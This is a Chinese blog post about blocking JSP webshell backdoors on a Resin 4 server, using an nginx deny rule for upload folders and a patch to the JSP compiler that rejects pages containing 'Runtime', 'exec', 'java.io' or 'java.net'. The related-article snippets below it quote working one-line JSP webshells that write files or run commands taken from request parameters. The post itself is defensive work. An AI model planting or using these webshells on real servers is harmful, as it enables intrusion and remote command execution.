WEB容器内解决JSP后门的一种方式

最新推荐文章于 2023-12-25 19:09:16 发布
最新推荐文章于 2023-12-25 19:09:16 发布
阅读量2.6k 收藏
点赞数
分类专栏: linux Java 文章标签: jsp后门 resin源码拦截jsp编译 jspx后门 Resin 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinajust/article/details/51560302
版权
linux 同时被 2 个专栏收录
15 篇文章 0 订阅
订阅专栏
Java
10 篇文章 0 订阅
订阅专栏

     JSP后门,本来是比较少的,但还是存在漏洞,被“有心之人”利用了,jsp后门主要从上传图片合并jsp后门,到服务器,后,执行jsp,包括所谓的菜刀,服务器中招之后,发现后门jsp,用nginx 方式禁止upload目录执行jsp,暂时解决问题:

      
location ~ ^/(upload|download)/.*\.(jsp)$
{
deny all;
}

但是还是不能从根本解决上传后门jsp的问题,如通过其他方式上传了后门JSP,这种方式仍然可能存在漏洞,包括jspx后门(内部都是编译为jsp),所以,想在web容器级别解决,就是在编译jsp的时候,判断jsp内容是否合法,合法再编译,否则拒绝编译,具体的jsp编译原理可以看网上的资料。这里举例子,Resin 4.0.40,下载源码(官方提供下载)后,跟踪调试,发现,在jsp处理,主要在com.caucho.jsp包内,QServlet 其中有一个方法:

  /**
   * Creates and returns a new page.
   *
   * @param request the servlet request
   * @param response the servlet response
   *
   * @return the compiled page
   */
  public Page getPage(HttpServletRequest request,
                      HttpServletResponse response)
    throws Exception

不难看出,这是创建编译jsp页面的一个主要方法,所以,在这页面里面,通过

page.getServletName() 得到加载的jsp文件路径,在编译之前检查jsp内容是否合法,

如果,不合法,在这个方法里面抛出错误就可以了。

这里面主要屏蔽jsp内容里面含有以下字符串:

public static String check_tag_2 = "Runtime";//jsp 执行本地命令用到的
public static String check_tag_3 = "exec";//jsp 执行本地命令用到的
public static String check_tag_4 = "java.io";//后门程序读取文件记录
public static String check_tag_5 = "java.net";//菜刀程序,反射机制用到

如含有以上字符串,一律屏蔽,以上为jsp主要后门利用方法,具体后门可以网上搜索查阅。可能有朋友说,io,和.net包都屏蔽了,是不是会影响正常jsp,其实,因为jsp属于页面层处理,里面很少用到这两个包,如真的在项目用到,也可以拦截时候判断。

        按照上面处理后,暂时系统处于安全。这也是是一个简单的思路,希望朋友们补充。



chinajust
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JSP一句话后门
01-08
<% if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“\\”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes()); %> 使用方法: 提交url! jsp?f=1.txt” target=”_blank”>http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld 然后:http://www.whitehouse.net
两种“新型”的javaweb后门(jspx和Java Logger)
weixin_30564785的博客
07-08 366
利用这个可以突破st2下 强制jsp跳转login.jsp 利用jspx解决jsp后缀被限制拿shell - Hack Blog | 黑客博客http://www.hackblog.cn/post/45.html 两种“新型”的javaweb后门(jspx和Java Logger) | HuGtion's Bloghttps://www.hugtion.com/?p=768 关于J...
jsp后门
收集盒 Book box
08-30 4439
by 园长MM  一:执行系统命令: 无回显执行系统命令: ? 1 "i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显,用来反弹个shell很方便。 有回显带密码验证的:
java基础:困扰jsp的一些问题与解决方法
03-14 572
如今每一个使用servlets的开发者都知道jsp一种由sun公司发明并花费大量精力加以推行并建构在servlet技术之上的web技术。jsp将servlet中的html代码脱离了出来,从而可以加速web应用开发和页面维护。实际上,由sun发布的官方"应用开发模型"文档上说得更远: "jsp技术应该被视为标准,而servlets
JavaWeb后门(webshell)基础
最新发布
st3pby的博客
12-25 1177
最著名的莫过于 PHP 的各种奇思妙想的后门,但与 PHP 不同的是,Java 是强类型语言,语言特性较为严格,不能够像 PHP 那 样利用字符串组合当作系统函数使用,但即便如此,随着安全人员的进一步研究, 依旧出现了很多奇思妙想的 JSP Webshell。Java是一种通用的计算机编程语言,它是并发的,基于类的,面向对象的,并且专门设计为具有尽可能少的实现依赖性。利用这个特性我们可以操作类名,从而达到躲避检测的目的。jsp的后缀可以兼容为jspx的代码,也兼容jspx的所有特性,如CDATA特性。
Java安全-Java Web后门学习 Jsp 一句话分析
Love&Share
05-03 2279
文章目录Java Web后门一句话木马反射调用类加载(冰蝎马实现方式)ELSE参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句话木马 最简单的 jsp 一句话木马 <% Runtime.getRuntime().exec(request.getParameter("i"));%> .
JSP WebSehll 后门脚本
悦分享
08-01 1221
目前很多大型厂商都选择使用Java进行Web项目的开发,近年来随着各种JAVA指定环境RCE漏洞的出现,JavaWeb的安全逐渐被人们所重视,与漏洞相关的还有用于后期维持权限的Webshell。与PHP不同的是,JSP的语言特性较为严格,属于强类型语言,并且在JDK9以前并没有所谓的eval函数。一般而言JSP的变形免杀较为困难,但是依旧存在很多的”黑魔法”。不知攻,焉知防。阿里云安骑士Webshell检测系统在迭代升级过程中,除了内部的不断绕过尝试以外,也长期邀请大量白帽子进行持续的绕过测试。...
JSP全能管理系统1.0-update08.1.10
Quantum Intelligence
10-09 8739
功能如下文件: 复制  移动 修改日期 删除 编辑 下载 上传 新建目录: 复制 移动 修改日期 打包zip 新建系统: 查看系统信息  环境变量信息 容器信息杂项: 运行(系统命令/文件)  API类反射 扫描远程机器端口  开启本机HTTP代理数据库: 查看数据库信息  查看数据库函数 查看数据库存储过程  执行SQL其中开启 HTTP代理由为特出~ 呵呵 只要别人一运
解决JSP开发中Web程序显示中文三种方法
10-30
JSP显示中文方法小结
经典强大的 2个jsp后门
06-16
经典强大的 2个jsp后门 某个黑哥写的 jsp后门
两个jsp后门
04-02
包含两个jsp后门,第一个被分解成了java代码用于学习,完善了其在线命令功能(原版本不能收到输出结果)
JSP报表打印的一种简单解决方案
09-28
JSP报表打印的一种简单解决方案, 在Word或Excel中制作报表的样式......
转载:JSP后门代码(原出处CSDN)
11-27 301
通过 jar cvf aa.war . 打包成aa.war文件 通过tomcat后台上传到服务器即可 试用了一下,功能很全面。 对数据库密码的获取没搞懂,不知道如何获取到sa的密码。 该后门的密码,我自己改成了用户s3密码s3 代码 <%@pageimport="java.util.*,java.io.*,java.sql.*,java.util.z...
几个IDS开源系统介绍
热门推荐
chinajust的专栏
11-29 1万+
Snort     在1998年,Marty Roesch先生用C语言开发了开放源代码(Open Source)的入侵检测系统,Snort  基于libpcap。目前最著名最活跃的开放源码NIDS项目,定位于轻量级的入侵检测系统,已经实现了网络探测器和许多第三方的管理及日志分析工具( http://www.snort.org/ ) Prelude IDS
/etc/crontab文件不执行
chinajust的专栏
05-10 4201
在/etc/crontab 文件末添加了 0 1 * * * /opt/sxx/x.sh 但是 x.sh 不执行,但x.sh,可以在root用户下执行。后来用 service crond status  查看,进程存在。用service crond reload  提示重新装载了,可还是不执行,最后用:crontab -l 发现没有 crontab ,才发现没有
linux 实现 端口转发【详细】
chinajust的专栏
05-22 2917
rinetd  古老、小、高效、开源Rinetd是为在一个Unix和Linux操作系统中为重定向传输控制协议(TCP)连接的一个工具。Rinetd是单一过程的服务器,它处理任何数量的连接到在配置文件etc/rinetd中指定的地址/端口对。尽管rinetd使用非闭锁I/O运行作为一个单一过程,它可能重定向很多连接而不对这台机器增加额外的负担。1.下载软件 rinetd.tar.gz.tar
Red hat linux下使用crontab实现oracle 10g 定时备份(包含SFTP下载说明)
chinajust的专栏
01-01 2144
这是说的定时备份是热备份,也就是写shell脚本,这是的语法是oracle10g的,9i稍微修改(用exp语法)  定时备份后,可以用客户端机器自动下载,用sftp客户端,设置成自动下载,如没有可以去网上找sftp的实现,java有开源的。 1.创建shell 备份脚本文件 #!/bin/sh #oracle command expcmd="/opt/ora10/product/
jsp和servlet运行于相同的容器Web容器
06-12
是的,JSP和Servlet运行于相同的容器,即Web容器Web容器是Java Web应用程序的执行环境,它负责管理Servlet和JSPWeb组件的生命周期,并提供请求处理、线程管理、安全控制等服务。JSP和Servlet都是Web组件,它们都...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值